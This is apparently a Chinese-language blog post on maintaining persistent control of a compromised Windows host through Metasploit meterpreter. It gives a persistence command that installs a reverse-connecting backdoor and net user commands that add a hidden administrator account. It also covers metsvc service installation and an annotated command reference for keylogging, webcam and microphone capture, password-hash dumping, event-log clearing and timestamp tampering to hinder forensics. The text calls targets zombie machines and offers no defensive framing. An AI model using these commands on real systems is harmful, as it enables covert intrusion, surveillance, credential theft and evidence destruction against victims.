反弹shell,获得一个会话后进行持续控制目标主机,就不需要每次进行攻击来取得 meterpreter

1.使用persistence模块

使用persistence模块可在目标计算机上安装一个永久性后门,即使有一天目标计算机修补了漏洞,我们仍然可以通过这个连接来实现对目标计算机的控制。
常用参数:
-X 开机自启动
-i payload重连的间隔时间
-p 反向连接端口号
-r 反向连接IP地址
persistence的详细帮助

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host. 
OPTIONS:
     -A        Automatically start a matching exploit/multi/handler to connect to the agent    
     -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.    
     -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.    
     -S        Automatically start the agent on boot as a service (with SYSTEM privileges)    
     -T <opt>  Alternate executable template to use    
     -U        Automatically start the agent when the User logs on
     -X        Automatically start the agent when the system boots
     -h        This help menu    
     -i <opt>  The interval in seconds between each connection attempt    
     -p <opt>  The port on which the system running Metasploit is listening    
     -r <opt>  The IP of the system running Metasploit listening for the connect back

run persistence -X -i 11 -p 6220 -r 192.168.1.104 然后用use exploit/multi/handler模块设置后进行监听

2.目标主机创建隐藏用户

获取目标主机的远程命令行shell
如果出错,可能是目标主机限制了cmd.exe的访问权,可以使用migrate注入到管理员用户进程中再试一试。
在cmd下输入以下

# 创建用户($符号,可以起到隐藏创建用户的目的)
net user test$ 123456 /add
# 将创建的用户添加到管理员组
net localgroup administrators test$ /add

3.通过metsvc服务的方式

运行run metsvc将会在目标主机上以Meterpreter的服务的形式注册在服务列表中,并开机自动自动。运行run metsvc -r卸载目标主机上的Meterpreter服务。

meterpreter的help信息

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session                           # 将当前会话放在后台运行(之后可用sessions -i xxid来交互)
    bgkill                    Kills a background meterpreter script                     # 杀死一个后台meterpreter脚本
    bglist                    Lists running background scripts                          # 后台列表
    bgrun                     Executes a meterpreter script as a background thread      # 作为一个后台线程运行脚本
    channel                   Displays information or control active channels
    close                     Closes a channel                                          # 关闭通道
    disable_unicode_encoding  Disables encoding of unicode strings                      # 禁用unicode编码
    enable_unicode_encoding   Enables encoding of unicode strings                       # 启用unicode编码
    exit                      Terminate the meterpreter session                         # 结束meterpreter会话,等同于quit
    get_timeouts              Get the current session timeout values                    # 获取当前会话的timeout值
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module                  # 查看post模块的信息
    irb                       Drop into irb scripting mode                              # 进入 Ruby 脚本模式
    load                      Load one or more meterpreter extensions                   # 加载插件,比如直接load mimikatz读取肉鸡的密码明文,而不需要通过hashdump然后解密
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process                     # 进程迁徙, 用于进程注入,配合PS命令,注入到一个具有system权限的进程,从而由超管账户administrator提权到system权限
    pivot                     Manage pivot listeners
    quit                      Terminate the meterpreter session                         # 结束、终止、退出meterpreter会话,等同于exit
    read                      Reads data from a channel
    resource                  Run the commands stored in a file                         # 执行存储在文件中的命令
    run                       Executes a meterpreter script or Post module              # 执行meterpreter脚本或者post模块
    sessions                  Quickly switch to another session                         # 会话
    set_timeouts              Set the current session timeout values                    # 设置当前会话的timeout值
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"                               # 加载meterpreter扩展,是load的别名,不过已被弃用
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel

Stdapi: File system Commands        #文件系统命令

# 在meterpreter命令下输入的linux文件命令默认针对目标肉鸡,比如pwd、getwd、ps、cat等,除非特殊说明(比如添加l字符,lpwd、getlwd)才是针对kali本机
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen     # 显示肉鸡上的文件内容,如cat c:\\111.txt
    cd            Change directory                              # 该表工作目录    
    checksum      Retrieve the checksum of a file               # 获取文件的校验和
    cp            Copy source to destination                    # 复制文件到目的地
    dir           List files (alias for ls)                     
    download      Download a file or directory                  # 下载肉鸡上的文件到当前kali机器,如download c:\\1111.txt /root
    edit          Edit a file                                   # 用vim编辑肉鸡上的文件,如edit c:\\xxx.txt
    getlwd        Print local working directory                 # 获取本地kali的当前工作目录(local work directory),等同于lpwd命令
    getwd         Print working directory                       # 获取被控肉鸡的工作目录,等同于pwd命令
    lcd           Change local working directory                # 切换kali本机的工作目录
    lpwd          Print local working directory                 # 输出本地kali的当前工作目录(lockl print work directory),等同于getlwd
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory                       # 输出被控肉鸡的工作目录,等同于pwd命令
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory                    # 上传本地文件、目录到远程肉鸡

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces                                                    # 查看ip
    ipconfig      Display interfaces                                                    # 查看ip
    netstat       Display the network connections                                       # 显示网络连接
    portfwd       Forward a local port to a remote service                              # 端口转发:比如被控肉鸡处在内网,使用该命令直接转发端口使用3389,而不需要在额外上传端口转发工具nc、lcx等
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table                                     # 查看或修改受害者路由表

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log                                                   # 清除受害者计算机上的事件日志(日志记录)
    drop_token    Relinquishes any active impersonation token.                          # 丢弃令牌,放弃(停止)假冒当前令牌。
    execute       Execute a command                                                     # 执行命令、文件,如execute -f cmd.exe -i 表示执行cmd.exe命令并进行交互。
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier                                    # 查看在被控肉鸡上的当前进程号(pid),即:反弹脚本的进程pid
    getprivs      Attempt to enable all privileges available to the current process     # 获取尽可能多的特权
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as                            # 查看被控肉鸡的权限,等同于whoami
    kill          Terminate a process                                                   # 杀死/结束进程,如kill 123,杀死pid为123的进程(配合ps命令查看进程id)
    localtime     Displays the target system's local date and time                      # 目标肉鸡系统的当地时间
    pgrep         Filter processes by name                                              # processes grep,通过名字过滤(检索)进程
    pkill         Terminate processes by name                                           # 通过名字来结束进程
    ps            List running processes                                                # 进程列表
    reboot        Reboots the remote computer                                           # 重启目标肉鸡
    reg           Modify and interact with the remote registry                          # 与目标主机注册表进行交互,创建,删除,查询等操作。
    rev2self      Calls RevertToSelf() on the remote machine                            # 在受害者机器上调用RevertToSelf(),回到控制目标主机的初始用户账户下。
    shell         Drop into a system command shell                                      # 进入目标肉鸡上的系统命令shell,比如windows上的cmd,linux上的bash
    shutdown      Shuts down the remote computer                                        # 关机
    steal_token   Attempts to steal an impersonation token from the target process      # 从system权限的目标进程盗窃令牌,进行令牌假冒,从而提权到system权限,类似migrate。
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS                  # 查看远程肉鸡的系统信息,比如计算机名、操作系统、体系结构、语言、域名、登录的用户数、运行在肉鸡上的反弹脚本类型

Stdapi: User interface Commands     # 用户接口命令
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations                     # 列出所有课访问的desktop
    getdesktop     Get the current meterpreter desktop                                  # 获取当前的 meterpreter 桌面
    idletime       Returns the number of seconds the remote user has been idle          # idle time,目标肉鸡已经空闲的时间
    keyscan_dump   Dump the keystroke buffer                                            # 导出击键记录缓存(键盘记录)
    keyscan_start  Start capturing keystrokes                                           # 开始捕获键盘记录(击键记录)
    keyscan_stop   Stop capturing keystrokes                                            # 停止键盘记录
    screenshot     Grab a screenshot of the interactive desktop                         # 截屏(目标肉鸡),文件会自动保存在kali本机
    setdesktop     Change the meterpreters current desktop                              # 切换到另一个用户界面(该功能基于那些用户已登录)。
    uictl          Control some of the user interface components                        # 控制/接管 目标主机的键盘和鼠标。

Stdapi: Webcam Commands             # 网络摄像头命令,(补充:如果需要实时观看目标肉鸡屏幕,可通过run vnc来开启)
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam

Priv: Elevate Commands              # 提权命令
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.            # 尝试将权限提升为system权限

Priv: Password database Commands    # 密码、数据库命令
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database                                # 导出哈希密码 (SAM) 文件中的值(密文形式),还需要进一步解密;"run hashdump"和"run smart_hashdump"两个脚本更加隐秘

Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes                                       # 操纵、修改、访问文件的MACE属性,例如修改文件的创建时间(反取证调查)。

Last modification:August 13th, 2019 at 07:59 pm
If you think my article is useful to you, please feel free to appreciate